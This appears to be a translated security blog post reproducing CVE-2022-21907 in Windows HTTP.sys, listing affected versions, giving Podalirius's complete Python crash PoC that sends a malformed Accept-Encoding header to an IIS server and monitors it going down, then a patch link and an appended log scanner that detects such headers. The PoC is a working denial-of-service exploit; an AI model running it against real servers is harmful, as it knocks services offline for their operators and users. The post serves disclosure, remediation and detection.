
HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2022-21907) Reproduction


Source: 洛米唯熊

0x00 Vulnerability overview

A remote code execution vulnerability exists in the HTTP protocol stack: a boundary error in the HTTP Trailer Support feature of HTTP.sys can lead to a buffer overflow.

An unauthenticated attacker can trigger the overflow by sending a specially crafted HTTP packet to a web server and thereby execute arbitrary code on the target system. Microsoft flags the vulnerability as "wormable": it requires no user interaction and could propagate itself across the network.

CVSS score: 9.8

0x01 Affected versions

Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

0x02 Reproduction

The crash PoC below (by Podalirius) sends a single GET request whose Accept-Encoding header carries a malformed value, while a background thread polls the target to show when it stops responding.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : CVE-2022-21907_http.sys_crash.py
# Author             : Podalirius (@podalirius_)
# Date created       : 13 Jan 2022

import argparse
import datetime
import requests
import time
import threading


def parseArgs():
    parser = argparse.ArgumentParser(description="Description message")
    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
    return parser.parse_args()


def monitor_thread(target, dtime=5):
    # Poll the target once per second and report whether it still answers.
    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)
    for k in range(dtime):
        try:
            r = requests.get(target, timeout=1)
        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout,
                requests.exceptions.ConnectionError) as e:
            print(" [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        else:
            print(" [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        time.sleep(1)


if __name__ == '__main__':
    options = parseArgs()

    # Default to plain HTTP when no scheme was given.
    if not options.target.startswith('http://') and not options.target.startswith('https://'):
        target = "http://" + options.target
    else:
        target = options.target

    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'

    # Starting monitoring thread
    t = threading.Thread(target=monitor_thread, args=(target,))
    t.start()
    time.sleep(2)

    # Sending payload: the malformed value goes in the Accept-Encoding header
    print(" [+] Sending payload ...")
    try:
        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)
    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout,
            requests.exceptions.ConnectionError) as e:
        t.join()
        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))

    # Cleanup
    t.join()

0x03 Remediation

Microsoft has released patches for the affected versions; affected users are advised to apply the official security update promptly. Link:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
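As an added defensive example (not part of the original post and not the PoC author's code), the following Python flags Accept-Encoding values shaped like the PoC header above when scanning access logs from a reverse proxy in front of IIS. The log format, the client-IP field and the allowlist of content codings are assumptions constructed for this example; the log lines are constructed, and the third one only mimics the shape of the PoC header.

```python
import re

# Allowlist of content codings a normal client requests (an assumption for this example).
KNOWN_CODINGS = {"gzip", "x-gzip", "deflate", "br", "compress", "x-compress",
                 "identity", "zstd", "*"}
# One Accept-Encoding list element: a coding name, optionally followed by ";q=<qvalue>".
_ELEMENT = re.compile(r"^([A-Za-z0-9*\-]+)(?:\s*;\s*[qQ]=(0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?$")

def accept_encoding_anomalies(value, max_len=256):
    """Return the reasons an Accept-Encoding value looks anomalous (empty list = looks benign)."""
    reasons = []
    if len(value) > max_len:
        reasons.append("header longer than %d bytes" % max_len)
    elements = [e.strip() for e in value.split(",")]
    if "" in elements:
        reasons.append("empty list element")
    for e in elements:
        if e == "":
            continue
        m = _ELEMENT.match(e)
        if m is None:
            reasons.append("malformed element %r" % e[:16])
        elif m.group(1).lower() not in KNOWN_CODINGS:
            reasons.append("unknown coding %r" % m.group(1)[:16])
    return reasons

# Constructed access-log lines in a hypothetical format: client "request" status "Accept-Encoding".
# The third line mimics the shape of the PoC header (comma list, '&', runs of '*', empty elements).
SAMPLE_LOG = [
    '198.51.100.5 "GET / HTTP/1.1" 200 "gzip, deflate, br"',
    '198.51.100.9 "GET /index.html HTTP/1.1" 200 "gzip;q=1.0, identity;q=0.5, *;q=0"',
    '203.0.113.7 "GET / HTTP/1.1" 000 "AAAAAAAA,AAAA&AA&**AAAA**A,AAAAAAAA,********AAAA, *, ,"',
]
_LOG = re.compile(r'^(\S+) "([^"]*)" (\d{3}) "([^"]*)"$')

def scan_log(lines):
    """Return (client, reasons) for each log line whose Accept-Encoding value is anomalous."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if m is None:
            continue
        reasons = accept_encoding_anomalies(m.group(4))
        if reasons:
            hits.append((m.group(1), reasons))
    return hits

if __name__ == "__main__":
    for client, reasons in scan_log(SAMPLE_LOG):
        print("%s: %s" % (client, "; ".join(reasons)))
```

Benign browsers send a short list of known codings, so a hit from this heuristic is worth correlating with the host's patch status rather than treated as proof of exploitation.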
